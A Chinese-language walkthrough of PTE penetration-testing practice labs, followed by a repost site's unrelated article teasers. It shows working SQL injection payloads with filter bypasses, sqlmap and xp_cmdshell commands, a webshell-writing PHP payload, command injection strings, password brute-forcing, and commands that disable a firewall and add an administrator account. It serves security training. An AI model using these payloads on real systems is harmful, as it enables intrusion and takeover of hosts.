PTE-靶场训练-1

PTE-靶场训练实战笔记

靶场搭建

靶场下载链接:

https://pan.baidu.com/s/1ce1Kk0hSYlxrUoRTnNsiKA?pwd=ha1x

 vim /etc/sysconfig/network-scripts/ifcfg-eth0

设置好后reboot重启一下即可,然后访问81-85端口,共5题。

因为靶场出了问题,只能打开第一题,建议按照原网络环境去设置仅主机模式,原IP地址是172.16.12.100,虚拟机中的攻击机也可以配置同网段仅主机模式即可,问题不大。

pet-2003设置net模式就好了,发现用桥接模式扫描端口失败

基础题目之SQL注入

通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中

手工注入的话有点麻烦,它过滤了union,可以使用双写绕过,ununionion,空格可以用%0a(回车符)绕过,#号可以用编码%23进行绕过。

首先判断字段数

 http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)%0aorder%0aby%0a5%23

order by到5就显示不正常,那么字段数就是4

然后就使用联合查询去注入

http://172.16.12.100:81/vulnerabilities/fu1.php?id=-1%27)%0aununionion%0aselect%0a1,load_file(%27/tmp/360/key%27),3,4%23

 也可以使用sqlmap完成本题,因为有简单的过滤,可以使用自带的绕过脚本space2comment

sqlmap.py -u http://192.168.136.155:81/vulnerabilities/fu1.php?id=1 --level 5 --risk 3 --tamper=space2comment

ok了,得出存在布尔型注入以及延时注入

因为本题的flag在/tmp/360/key文件,那么我们直接进入到sql-shell,用查询语句获得flag

sqlmap.py -u http://192.168.136.155:81/vulnerabilities/fu1.php?id=1 --level 5 --risk 3 --tamper=space2comment --sql-shell

 进入sql-shell以后,我们用load_file语句去读取文件

select load_file('/tmp/360/key');

得出key:8b3h4a7v

基础题目之文件上传突破

文件上传突破,需要绕过WAF过滤

上传一句话木马没反应,上传普通的图片是有显示上传成功

制作图片马:

copy /b tupian.jpg+shell.php 1ndex.jpg

 上传后抓包改成php,没反应,应该是waf拦截

这时候绕过waf,可以改成php2,php3,php4等,发现2和4都能成功上传,当然蚁剑只有4的,那就用4连接

蚁剑测试连接成功

在html目录发现key

key2:8t5s0x5t

基础题目之文件包含

通过你所学到的知识,测试该网站可能存在的包含漏洞,尝试获取webshell,答案就在根目录下key.php文件中。

http://172.16.12.100:83/vulnerabilities/fu1.php?file=../../etc/passwd

说明是存在文件包含漏洞的。那么我们可以测试一下存不存在远程文件包含和本地文件包含

首先测试php://input,看可不可以用伪协议,有输出就说明可以用

 然后试试远程文件包含第二题的一句话木马(去掉图片内容),好像不行

那么就剩下本地文件包含了,可以用伪协议写入

<?php fputs(fopen('a.php', 'w'),'<?php eval($_POST[anhunsec]); ?>'); ?>

 

连接成功

php://filter伪协议

?file=php://filter/convert.base64-encode/resource=../key.php

key:6u3x9t2p

基础题目之命令执行

通过你所学到的知识,通过执行Linux命令获取webshell,答案就在根目录下key.php文件中。

输入ip,他就可以执行ping命令

127.0.0.1 | id

 

127.0.0.1 | cat key.php

包含敏感字符,过滤了cat,

其实应该先找key文件在哪里,它过滤了ls,那么只能盲测,less是没有被过滤的,那么直接less key.php,看能不能显示出内容。

127.0.0.1 | less key.php

很显然,没有反应。

那么就切换到上一级目录

127.0.0.1 | less ../key.php

 

他有显示GET it,说明key文件是在上一级目录,那么怎么获取他的key呢?其实可以使用grep去查找带有key字样的内容

127.0.0.1 | grep 'key' ../key.php 

key:3s9j6c2k

基础题目之日志分析

最近管理员很苦恼,发现自己的服务器被人入侵了,但是不知道原因,你能帮帮他吗?

管理员把日志保存下来了,大概分析了一下,有两个IP对服务器进行了攻击, 感觉攻击者的IP是 172.16.12.12 。

日志下载地址:当前目录下的 access.log

本题可以借助应急响应工具中的星图工具去分析。

当然考试当中可能没有日志分析工具,那么就只能一个个看啦!

 那么题目提示说攻击者的IP是 172.16.12.12,那么就只要找这个IP的信息,当然攻击分析好像没发现什么,那么去看常规日志分析

发现访问比较多的是/adminlogin.php,那么我去访问一下

发现一个登陆页面,那么直接爆破就可以啦,注意,一般考试不会让你爆破很久,选字典的时候选少一点

根据返回的长度值,和其他不一样就说明密码是正确,并且返回的状态码是302跳转。那么账号密码就是admin | password123

key:9y6u8s5m

综合题-2003

已知IP地址是:192.168.1.119,端口范围在27000-28000

首先namp扫描端口

nmap -sS -T4 -p 27000-28000 192.168.136.136

扫描到27689端口开放,访问后是一个文件上传下载系统

还不知道账号密码,先扫描一波目录,当然最好使用多个工具互补扫描

发现存在robots.txt以及一个配置备份文件

有数据库的账号密码,直接用navcat去连接,是sql server的数据库

得到登陆账号和密码admin |asdadwn_d2112

key1

登陆后得到key1:4k3s9m3d

上传aspx马

然后进入文件上传功能,上传aspx的马。先正常上传shell.aspx,提示该文件不允许上传,文件名先改成.jpg格式上传

aspx木马可以用网站上的bbbbbbbb.aspx文件。

发现上传成功

点击管理上传文件,发现文件名jp后面去掉了g

经过多次测试,文件名达到8位字符时,就可以省略后面的jpg,因为页面中说了文件名过长会被系统截取包括系统时间在内的前32位字符作为文件名,请上传的文件名称不要过长.时间是18个字符,杠一个字符,.aspx5个字符,总共24字符,32-24=8,说明文件名要8位字符,才能把.jpg后面都被系统截断

随后就是找文件路径了,点击最下面上传的文件

发现它的上传路径是upfile/affix/

然后拼接一下webshell路径

http://192.168.136.136:27689/upfile/affix/638123235837656250-shelllll.aspx

 

key2

web根目录获得key2:2a3s9p4d

接下来就是进入系统桌面,但是发现权限不够

在web目录中,看到了web.config.back-2017-12-12文件,点开来刚好是sa权限的用户

key3

那么继续使用navcat去连接

连接后使用sql-server查询语句去查询系统文件

先看看桌面里有什么文件

exec xp_cmdshell 'dir "C:\Documents and Settings\Administrator\桌面"'

 

发现有个key,txt,接下来就读取一下就行了

exec xp_cmdshell 'type "C:\Documents and Settings\Administrator\桌面\key.txt"'

 

后面发现,在数据库中直接点击也可以发现key3值。

key3:4d9d3q8v

或者在蚁剑上关闭靶机防火墙,重置管理员密码,上传3389开启脚本,执行3389开启脚本,连接远程登录,进入靶机去桌面、垃圾桶里找key文件。

# win2003关闭防火墙命令
netsh firewall set opmode mode=disablenet user admin admin /add
net localgroup administrators admin /addnet user administrator 123456

 

综合题-2008

靶场:Windows Server 2008 R2 x64

修改靶场机IP:

IP为:192.168.209.139

认证爆破密码

看到phpstudy开启,浏览器访问上面IP,发现有访问认证:

尝试BP抓包,爆破:

发现Authorization认证,是base64加密,解密查看是:admin:admin

对密码进行爆破:

选择第四个工具方式,添加第一个变量:(admin:)、第二个变量(admin),Payloads:

Authorization: Basic YWRtaW46MTIzNDU2

解码是:(admin:123456)

key1

得到key值:

因为有认证,别的目录扫描工具已经不行了,要用BP抓取带有认证的数据包进行目录爆破:

发现字典路径有中文会报错,需要复制到英文路径下:

知道数据库后台登录页面,phpMyAdmin (root/root)

在dedecmsv56utf数据库中找到:dede\_admin

搜索知道dede的密码需要进行MD5编码,然后删除前五位和后七位的字母,字母小写:

修改好密码,登录前面的DEDECMS

(前面爆破出来的301状态码url:http://192.168.209.139/dede):

在模块->标签里找到php文件,写入一句话木马:

蚁剑添加认证信息

用蚁剑连的时候要注意,除了基础操作外,还需要添加认证信息:

连接成功:

key2

看到key2值:

关闭防火墙

输入命令,关闭靶机防火墙:

netsh firewall set opmode disable

添加用户和组

添加用户和组、以及修改管理员密码:

net user admin admin /add
net localgroup administrators admin /addnet user administrator 123456

 

上传开启3389脚本:

运行:

连接远程桌面: 

key3

在垃圾桶中找到key3值,完成主机渗透。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/35330.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

C++ Primer 中文版 第5版 读书笔记

读书过程中发现&#xff0c;读得越多&#xff0c;忘得越多。因此记录读书笔记 1.2 初始输入输出 向流写入数据 <<运算符&#xff08;输出运算符&#xff09;接受两个运算对象&#xff1a;左侧的运算对象必须是一个ostream对象&#xff0c;右侧的运算对象是要打印的值。…

Vatee万腾平台:一站式智慧服务,让生活更美好

在数字化浪潮席卷全球的今天&#xff0c;我们生活的方方面面都在经历着前所未有的变革。Vatee万腾平台凭借其一站式智慧服务&#xff0c;正成为推动这场变革的重要力量&#xff0c;让我们的生活变得更加美好。 Vatee万腾平台&#xff0c;作为一家专注于提供智慧服务的领军企业&…

基于weixin小程序校园快递系统的设计

管理员账户功能包括&#xff1a;系统首页&#xff0c;个人中心&#xff0c;管理员管理&#xff0c;用户管理&#xff0c;订单管理&#xff0c;快递管理&#xff0c;快递记录管理&#xff0c;公告管理&#xff0c;基础数据管理 小程序功能包括&#xff1a;系统首页&#xff0c;…

企业有必要安装数据文件加密软件吗?哇!这么多好处

需要的 一、查看以下分析&#xff0c;便能得出结论 安全防护提升&#xff1a;禁止拷贝、打印、截屏等&#xff0c;还能够设置文件的浏览次数、有效期&#xff0c;提供多层次的文档保护措施。 核心机密保护&#xff1a;企业的核心机密文件、技术资料、客户资料等重要信息是公…

reactjs18 中使用@reduxjs/toolkit同步异步数据的使用

react18 中使用@reduxjs/toolkit 1.安装依赖包 yarn add @reduxjs/toolkit react-redux2.创建 store 根目录下面创建 store 文件夹,然后创建 index.js 文件。 import {configureStore } from "@reduxjs/toolkit"; import {counterReducer } from "./feature…

Does a vector database maintain pre-vector chunked data for RAG systems?

题意&#xff1a;一个向量数据库是否为RAG系统维护预向量化分块数据&#xff1f; 问题背景&#xff1a; I believe that when using an LLM with a Retrieval-Augmented Generation (RAG) approach, the results retrieved from a vector search must ultimately be presented…

WIFI各版本的带宽

带宽的定义&#xff1a; 带宽在网络领域通常指信道带宽&#xff0c;即信号在频谱中占用的频宽&#xff0c;单位是MHz&#xff08;兆赫&#xff09;。在无线通信中&#xff0c;带宽越宽&#xff0c;能够传输的数据量越大&#xff0c;因此信道带宽直接影响着数据传输速率。WiFi标…

FairGuard游戏加固无缝兼容 Android 15 预览版

2024年6月25日&#xff0c;谷歌发布了 Android 15 Beta 3 &#xff0c;作为Android 15 “平台稳定性”的里程碑版本&#xff0c;谷歌建议所有应用、游戏、SDK、库和游戏引擎开发者都将“平台稳定性”里程碑版本作为规划最终兼容性测试和公开发布的目标。 安卓开发者博客提供的版…

【2024-热-办公软件】ONLYOFFICE8.1版本桌面编辑器测评

在今日快速发展的数字化办公环境中&#xff0c;选择一个功能全面且高效的办公软件是至关重要的。最近&#xff0c;我有幸体验了ONLYOFFICE 8.1版本的桌面编辑器&#xff0c;这款软件不仅提供了强大的编辑功能&#xff0c;还拥有众多改进&#xff0c;让办公更加流畅和高效。在本…

货运大模型的未来:轻量化、场景化

“加快数字化和智能化转型发展&#xff0c;已成为物流行业的重要战略方向。”6月25日&#xff0c;在第十九届中国国际物流节暨第二十一届中国国际运输与物流博览会&2024亚洲物流双年展在上海开幕&#xff0c;中国交通运输协会会长、原铁道部副部长胡亚东在开幕致辞中表示。…

Python实践项目讲解:如何用制作一个桌面宠物

制作一个桌面宠物&#xff08;Desktop Pet&#xff09;在Python中通常涉及多个步骤&#xff0c;包括创建宠物的图形界面、添加动画效果、处理用户交互等。下面是一个简化的步骤指南&#xff0c;帮助你开始使用Python制作桌面宠物&#xff1a; 选择图形库&#xff1a; Tkinter&…

新能源行业必会基础知识-----电力市场概论笔记-----绪论

新能源行业知识体系-------主目录-----持续更新(进不去说明我没写完)&#xff1a;https://blog.csdn.net/grd_java/article/details/139946830 目录 1. 电力市场的定义2. 对传统电力系统理论的挑战 1. 电力市场的定义 1. 我国电力市场的进程 我国新一轮电力体制改革的5大亮点&…

【Echarts】散点图 制作 气泡 类型图表

目录 需求主要代码效果展示注 需求 需参照设计图画出对应图表 主要代码 /**** 数据 ****/ this.dataList [...Array(8).keys()].map((item) > {return {ywlxmc: 业务类型 (item 1),sl: item > 4 ? 50 : 70} })/**** 气泡样式 ****/ const styleList [{offset: [56…

NVIDIA控制面板3D设置一栏中不能通过预览更改图形设置的解决办法

今天因为GeForce Experience弹窗让我更新之后&#xff0c;手欠直接删掉了 然后图中标出的两个选项就没了 解决方法很简单&#xff0c;就是下回来&#xff0c;hhh https://www.nvidia.cn/geforce/drivers/ 直接下载就行&#xff0c;不用管版本&#xff0c;但是这种驱动千万不要…

U盘提示格式化怎么搞定?本文有5种方法(内含教程)

U盘提示格式化是一种常见故障&#xff0c;即&#xff1a;当U盘插入电脑后&#xff0c;电脑上弹出对话框&#xff0c;提示该U盘需要格式化才能使用。 接触不良、文件系统损坏、热插拔、感染病毒、芯片损坏等原因都可能导致U盘出现此故障。这时点击“格式化”&#xff0c;大概率会…

蒸汽架空管道中的关键守护者:滑动管托、导向管托与固定管托

蒸汽架空管道中的关键守护者&#xff1a;滑动管托、导向管托、固定管托与补偿器的重要角色在蒸汽架空管道系统中&#xff0c;每一个组件都扮演着不可或缺的角色&#xff0c;共同确保管道的安全、高效运行。今天&#xff0c;我们就来深入探讨滑动管托、导向管托、固定管托以及补…

武汉星起航:深度洞察消费趋势,亚马逊美国站选品独具匠心

亚马逊美国站作为全球电商巨头的重要分支&#xff0c;其选品特点不仅反映了美国市场的消费趋势&#xff0c;更引领着全球消费者的购物潮流。从运动户外、宠物用品到美容个人护理&#xff0c;亚马逊美国站的选品策略始终紧跟市场脉搏&#xff0c;为消费者提供丰富多样、品质优良…

简化收支记录,只留关键日期! 一键掌握财务流动,高效管理您的每一笔收支

在繁忙的生活中&#xff0c;管理个人或家庭的财务收支变得尤为重要。然而&#xff0c;传统的记账方式往往繁琐且复杂&#xff0c;让人望而却步。今天&#xff0c;我们为您推荐一款简洁易用的记账神器——晨曦记账本&#xff0c;让您轻松记录收支&#xff0c;只显示日期&#xf…

揭秘!这款电路设计工具让学校师生都爱不释手——SmartEDA的魔力何在?

随着科技的飞速发展&#xff0c;电子设计已成为学校师生们不可或缺的技能之一。而在众多的电路设计工具中&#xff0c;有一款名为SmartEDA的工具&#xff0c;凭借其强大的功能和友好的用户体验&#xff0c;迅速赢得了广大师生的青睐。今天&#xff0c;就让我们一起探索SmartEDA…

Leetcode TOP5 题目和解答:这里只提供一种解题思路,希望引导大家持续学习,可以采用FlowUs息流记录自己的学习

LeetCode 是一个在线编程平台&#xff0c;它提供了大量的算法题目供用户练习。 TOP5题目通常指的是 LeetCode 网站上最受欢迎的前5道题目。 以下是 LeetCode TOP5 题目的列表以及它们常见的解题思路和代码示例。 题目1 两数之和 两数之和 - 1. Two Sum Given an array of int…